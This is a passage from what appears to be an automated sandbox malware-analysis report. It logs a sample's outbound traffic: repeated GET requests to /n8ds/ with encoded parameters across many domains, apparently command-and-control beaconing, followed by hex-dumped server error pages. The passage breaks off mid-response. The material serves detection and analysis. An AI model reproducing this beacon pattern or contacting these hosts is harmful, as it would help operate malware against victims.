        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=wE3cJZPNojFXEHzVtPzLvjQgQ8siWlvoMBTDgMX5y9SxEB5bNYsjP9rL8bMOP+2FRUIW&E0Dpk=l8hHaF HTTP/1.1Host: www.talkingpoint.toursConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&E0Dpk=l8hHaF HTTP/1.1Host: www.mackthetruck.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=diws0RRfDxwvVlRuoC4BJCkr8rc2YRL+Z6kcdn/HANybL0ntvNIGnh8uTRYHcPOHwusF&E0Dpk=l8hHaF HTTP/1.1Host: www.unitedmetal-saudi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=Jv+KBR9TMcpwNTBIzPqg8qhOh/MOyYoQ7cFMdSYE1xgXhr2Qjx48HBx6QPFrGWZkW9Pq&E0Dpk=l8hHaF HTTP/1.1Host: www.palmasdelmarcondos.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=3XBGTKX1IO0m2ps0OCefiLpUWq3mTk3XjxcX7A828ivUAOqw78DSKkuwDvhVWOojGfRi&3fVD2v=9rZXD0c8pBS HTTP/1.1Host: www.dietatrintadias.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl HTTP/1.1Host: www.helpcloud.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=QiVr4NomMTfDVQzLAZiPy17hhsXauZOjQhEkIhfcDYRSe01pzyB5iClqESLJZee3iuRd&3fVD2v=9rZXD0c8pBS HTTP/1.1Host: www.stylesbykee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4&3fVD2v=9rZXD0c8pBS HTTP/1.1Host: www.lopsrental.leaseConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=6hsdwDWbOloW+oddmH1y3GuNa2NTUXQYB9VwdvKa8csc++KRKb370Nh870wRdtnpcbjn HTTP/1.1Host: www.mummymotors.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=prkX5vIEewOKdb4uapSD5zP9OaJ72kAqHOW75HdD0V+URkfePb3G34/1ninLd5DC/lUo&y6AH=yHQDs HTTP/1.1Host: www.yghdlhax.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=/jsG/ERKVryn6C207o/LcEim1QqN5MyxJsKeesIBefptic1Rr4NlAfFwHDf6m9wpfQov&y6AH=yHQDs HTTP/1.1Host: www.littlefishth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=c2GcPcxTJCn2LTXtZlkaUw2pSxcw64fMJrFLz4vK/kX5/sVAgoQGq8HC2c+bDUK23KGm&y6AH=yHQDs HTTP/1.1Host: www.growebox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=WOFmZk82z8UpNC4mY/AvD/Zy3C9NxlTUz/ym6JpmI0LbMg439xvRHQoxZAlOCyCIZ92f&y6AH=yHQDs HTTP/1.1Host: www.topwowshopping.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4&y6AH=yHQDs HTTP/1.1Host: www.lopsrental.leaseConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=3XBGTKX1IO0m2ps0OCefiLpUWq3mTk3XjxcX7A828ivUAOqw78DSKkuwDvhVWOojGfRi&3fVD2v=9rZXD0c8pBS HTTP/1.1Host: www.dietatrintadias.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl HTTP/1.1Host: www.helpcloud.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=QiVr4NomMTfDVQzLAZiPy17hhsXauZOjQhEkIhfcDYRSe01pzyB5iClqESLJZee3iuRd&3fVD2v=9rZXD0c8pBS HTTP/1.1Host: www.stylesbykee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4&3fVD2v=9rZXD0c8pBS HTTP/1.1Host: www.lopsrental.leaseConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=6hsdwDWbOloW+oddmH1y3GuNa2NTUXQYB9VwdvKa8csc++KRKb370Nh870wRdtnpcbjn HTTP/1.1Host: www.mummymotors.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?B85P=7nvHaF&lZOD=xlQ0Win+OWEEdOu7BqbL/FEFl5i/i6MXL9UXMpB5xFgkztpNPhPNR2/8wQo9B3jWcPv9 HTTP/1.1Host: www.divorcefearfreedom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=YRa5YekRSAscu3KREIVoiFdBwJD7Q6+kwilTnNtYZuu2w/klC7MTP9008fix5v3TRxpN&B85P=7nvHaF HTTP/1.1Host: www.reliablehomesellers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?B85P=7nvHaF&lZOD=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c HTTP/1.1Host: www.dif-directory.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=WOFmZk82z8UpNC4mY/AvD/Zy3C9NxlTUz/ym6JpmI0LbMg439xvRHQoxZAlOCyCIZ92f&B85P=7nvHaF HTTP/1.1Host: www.topwowshopping.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: Joe Sandbox ViewIP Address: 50.62.172.157 50.62.172.157
        Source: unknownNetwork traffic detected: DNS query count 32
        Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
        Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
        Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 29 Nov 2021 13:07:39 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 23 Jul 2019 14:50:08 GMTAccept-Ranges: bytesContent-Length: 2361Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d 20 64 65 20 53 69 74 65 20 63 6f 6d 20 44 6f 6d c3 ad 6e 69 6f 20 47 72 c3 a1 74 69 73 20 2d 20 48 6f 73 74 47 61 74 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 35 37 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 35 37 78 35 37 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 37 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 39 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 39 36 78 39 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 38 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 32 38 78 31 32 38 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 29 Nov 2021 13:08:05 GMTContent-Type: text/htmlContent-Length: 275ETag: "61973ffe-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 29 Nov 2021 13:09:02 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be735-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 29 Nov 2021 13:09:18 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 23 Jul 2019 14:50:08 GMTAccept-Ranges: bytesContent-Length: 2361Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d 20 64 65 20 53 69 74 65 20 63 6f 6d 20 44 6f 6d c3 ad 6e 69 6f 20 47 72 c3 a1 74 69 73 20 2d 20 48 6f 73 74 47 61 74 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 35 37 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 35 37 78 35 37 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 37 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 39 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 39 36 78 39 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 38 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 32 38 78 31 32 38 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 29 Nov 2021 13:09:39 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 282Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6f 70 73 72 65 6e 74 61 6c 2e 6c 65 61 73 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.lopsrental.lease Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 29 Nov 2021 13:09:58 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576c-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 29 Nov 2021 13:10:39 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be735-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 29 Nov 2021 13:10:51 GMTServer: ApacheContent-Length: 207Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 6e 38 64 73 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /n8ds/on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 29 Nov 2021 13:11:01 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecache-control: no-cache, no-store, must-revalidate,post-check=0,pre-check=0expires: 0last-modified: Mon, 29 Nov 2021 13:11:01 GMTpragma: no-cachevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VxbqNNAHRhgi3pBNdK8WWqcOQjiYdxJ5FzwnhvoKea0z6d8rOaIAkM7vyOFdByvTmqxDIjDEY0Emdr5zM5kbzygexNo1c6NNYXcJC6kkHEGojM6tc1w1%2Bu9mgsyq18EZdLjtLU5rwZ9oWps%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6b5c1456dbd92bca-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a Data Ascii: d404 Not Found
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 29 Nov 2021 13:11:01 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecache-control: no-cache, no-store, must-revalidate,post-check=0,pre-check=0expires: 0last-modified: Mon, 29 Nov 2021 13:11:01 GMTpragma: no-cachevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=P0nVeigE4yxlGLcZ5Cxy5N91cTSPfrIg%2FVBMIW1SjcGx9OD53wnMYSbR8VKLLjqeFjkuipPEIcScImvIaaIOy8M%2BP1%2BRZaWKEdpz7vmy8clGX3Nf5JHrz6yp4cRvSm24rrPBfVHNUl0nerg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6b5c1456cb616916-FRAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; 